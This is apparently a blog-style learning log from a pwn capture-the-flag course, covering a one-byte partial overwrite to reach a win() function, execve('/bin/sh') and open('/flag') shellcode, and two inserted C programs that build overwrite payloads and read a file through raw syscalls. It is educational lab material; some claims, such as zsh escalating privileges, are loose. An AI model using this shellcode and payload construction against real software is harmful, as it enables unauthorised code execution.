Pwn Day8–9
I heard great things about pwn. It's time to finally go through it from beginning to end!
I am using Medium as a repo for my notes from the pwn courses.
Previously I went over partial overwrites
Continuing from that
To recap: all I have to overwrite to return to the win function is one byte.
Proof is in the objdump
What I highlighted was the current value of ret. If I rerun this program
As seen, all trailing bytes are different, but the rest is all the same!
So a simple 120-byte overflow with one extra byte as a partial overwrite, and I get this
A pointer to win()
This is as simple as ret2win gets, in all honesty.
I want to note this does not always work because of randomization.
We can see that above as shown
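To make the one-byte reasoning above concrete, here is an added C example of my own (not code from the post or from the pwn course): given the saved return address seen in the debugger and the address of win(), it works out how many low bytes have to be overwritten, how many of those bits ASLR randomizes, and builds the padding-plus-partial-overwrite payload. The 120-byte padding follows the post; the two address pairs in main() are constructed for illustration, and the ASLR model (low 12 bits fixed, bits 12 to 39 randomized) is an assumption matching the x86-64 Linux default.

```c
// Added example (not from the post): planning a partial overwrite of the
// saved return address for ret2win under PIE/ASLR. x86-64 Linux assumed.
#include <stdint.h>
#include <stdio.h>
#include <string.h>

// Assumed ASLR model: the low 12 bits (page offset) never change between
// runs; bits 12..39 are randomized (28 bits, the x86-64 Linux default).
#define ASLR_LOW_BIT  12
#define ASLR_HIGH_BIT 40

// Number of low bytes of `ret` that must change to turn it into `win`.
size_t bytes_to_overwrite(uint64_t ret, uint64_t win) {
    uint64_t diff = ret ^ win;
    size_t n = 0;
    while (diff) { n++; diff >>= 8; }
    return n;
}

// How many randomized bits the overwritten bytes contain. 0 means the
// partial overwrite is deterministic; k means a 1-in-2^k guess per run.
unsigned randomized_bits(uint64_t ret, uint64_t win) {
    size_t bits = bytes_to_overwrite(ret, win) * 8;
    if (bits > ASLR_HIGH_BIT) bits = ASLR_HIGH_BIT;
    return bits > ASLR_LOW_BIT ? (unsigned)(bits - ASLR_LOW_BIT) : 0;
}

// Build the payload: `pad` filler bytes up to the saved return address,
// then only the low bytes of `win` that differ, in little-endian order.
// Returns the payload length, or 0 if it does not fit in `cap`.
size_t build_payload(uint8_t *out, size_t cap, size_t pad,
                     uint64_t ret, uint64_t win) {
    size_t n = bytes_to_overwrite(ret, win);
    if (pad + n > cap) return 0;
    memset(out, 'A', pad);
    for (size_t i = 0; i < n; i++)
        out[pad + i] = (uint8_t)(win >> (8 * i));
    return pad + n;
}

int main(void) {
    // Constructed addresses: same page, so only the low byte differs.
    uint64_t ret = 0x55555555519a, win = 0x5555555551b5;
    uint8_t payload[256];
    size_t len = build_payload(payload, sizeof payload, 120, ret, win);
    printf("overwrite %zu byte(s), %u randomized bit(s), payload %zu bytes\n",
           bytes_to_overwrite(ret, win), randomized_bits(ret, win), len);

    // Constructed: win() in a different page, so two bytes must change and
    // 4 of those 16 bits are randomized (1-in-16 chance per run).
    uint64_t ret2 = 0x555555555f9a;
    printf("overwrite %zu byte(s), %u randomized bit(s)\n",
           bytes_to_overwrite(ret2, win), randomized_bits(ret2, win));
    return 0;
}
```

The second case is the "does not always work" situation: once the overwrite has to reach past the page offset, the payload is guessing ASLR bits and the exploit only lands some of the time.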
The current challenge I am stuck on is giving me this
So my guess is that I am trying to access memory out of scope.
I know for my syscall I want execve("/bin/sh", 0, 0)
.intel_syntax noprefix
.global _start
_start:
mov rax, 59            # SYS_execve
lea rdi, [rip+binsh]   # pathname
mov rsi, 0             # argv = NULL
mov rdx, 0             # envp = NULL
syscall
binsh: .asciz "/bin/sh"
Looks like I got the shell, but the permissions are not valid. This is due to /bin/sh only escalating to user privs.
From the strace I can confirm execve is working properly, from the return of 0.
Well, from looking at other shells, I can use zsh to escalate!
This time I want to fetch the flag through the open file descriptor
.intel_syntax noprefix
.global _start
_start:
mov rbx, 0x00000067616c662f   # "/flag\0" as a little-endian immediate
push rbx                      # rsp now points at the NUL-terminated path
mov rax, 2                    # SYS_open
mov rdi, rsp                  # pathname
mov rsi, 0                    # flags = O_RDONLY
syscall                       # fd (or -errno) comes back in rax
Looks like I didn't create an fd because of an error. This is due to bad perms.
Because this fd, which handles files, is not working the way I want, it's time to execute this as root.
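As an added example of my own (not the post's shellcode and not pwn.college's code), here is the open/read/write flow the fd approach above is building toward, done from C with raw syscalls so the same steps can be checked before hand-writing them in assembly. It packs a path into the 8-byte little-endian immediates that `mov rbx, 0x00000067616c662f ; push rbx` hand-encodes, which also covers the "/bin/sh" string from the execve section and paths longer than seven characters (those need more than one push), then opens, reads and closes the file with the syscall instruction and returns -errno when open fails, which is the bad-perms case above. The sample file path and contents in main() are constructed; x86-64 Linux is assumed for the inline asm, with a libc syscall() fallback on other targets.

```c
// Added example (not from the post): pack a path the way the post's
// `mov rbx, <imm>; push rbx` does, then open/read/write it with raw syscalls.
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>          // O_RDONLY, AT_FDCWD
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>         // syscall() fallback on non-x86-64
#include <sys/syscall.h>

// Pack a NUL-terminated path into 8-byte little-endian immediates. Chunks
// come back in memory order; push them in REVERSE so chunk 0 ends up at
// the lowest address (rsp). The terminating NUL is always included.
size_t path_chunks(const char *path, uint64_t *out, size_t max) {
    size_t len = strlen(path) + 1;            // include the NUL
    size_t n = (len + 7) / 8;
    if (n > max) return 0;
    for (size_t i = 0; i < n; i++) {
        uint64_t v = 0;
        for (size_t j = 0; j < 8 && i * 8 + j < len; j++)
            v |= (uint64_t)(unsigned char)path[i * 8 + j] << (8 * j);
        out[i] = v;
    }
    return n;
}

// Three-argument raw syscall: returns rax, i.e. the result or -errno.
static long raw_syscall3(long nr, long a, long b, long c) {
#if defined(__x86_64__) && defined(__linux__)
    long ret;
    __asm__ volatile("syscall"
                     : "=a"(ret)
                     : "a"(nr), "D"(a), "S"(b), "d"(c)
                     : "rcx", "r11", "memory");
    return ret;
#else
    long ret = syscall(nr, a, b, c);   // libc wrapper reports via errno
    return ret < 0 ? -errno : ret;
#endif
}

// open(path, O_RDONLY) / read / close via raw syscalls.
// Returns bytes read, or -errno (e.g. -EACCES on bad perms, -ENOENT).
long read_file_raw(const char *path, char *buf, size_t cap) {
#ifdef SYS_open
    long fd = raw_syscall3(SYS_open, (long)path, O_RDONLY, 0);
#else
    long fd = raw_syscall3(SYS_openat, AT_FDCWD, (long)path, O_RDONLY);
#endif
    if (fd < 0) return fd;
    long n = raw_syscall3(SYS_read, fd, (long)buf, (long)cap);
    raw_syscall3(SYS_close, fd, 0, 0);
    return n;
}

// Helper used only to create the constructed sample file for the demo.
int write_sample_file(const char *path, const char *content) {
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(content, f);
    return fclose(f);
}

int main(void) {
    uint64_t chunks[4];
    size_t n = path_chunks("/flag", chunks, 4);
    for (size_t i = 0; i < n; i++)        // reverse order: last chunk first
        printf("mov rbx, 0x%016llx ; push rbx\n",
               (unsigned long long)chunks[n - 1 - i]);

    const char *path = "/tmp/pwn_day9_sample_flag";   // constructed, not /flag
    write_sample_file(path, "pwn.college{example}\n");
    char buf[128];
    long got = read_file_raw(path, buf, sizeof buf - 1);
    if (got < 0) {
        printf("open/read failed: -%ld (%s)\n", -got, strerror((int)-got));
        return 1;
    }
    raw_syscall3(SYS_write, 1, (long)buf, got);     // write the flag to stdout
    return 0;
}
```

When open fails on the real target, rax holds the negative errno rather than an fd, so a shellcode that goes straight on to read will fail silently; checking rax after the open syscall (as read_file_raw does) is what turns "no fd" into a readable -EACCES.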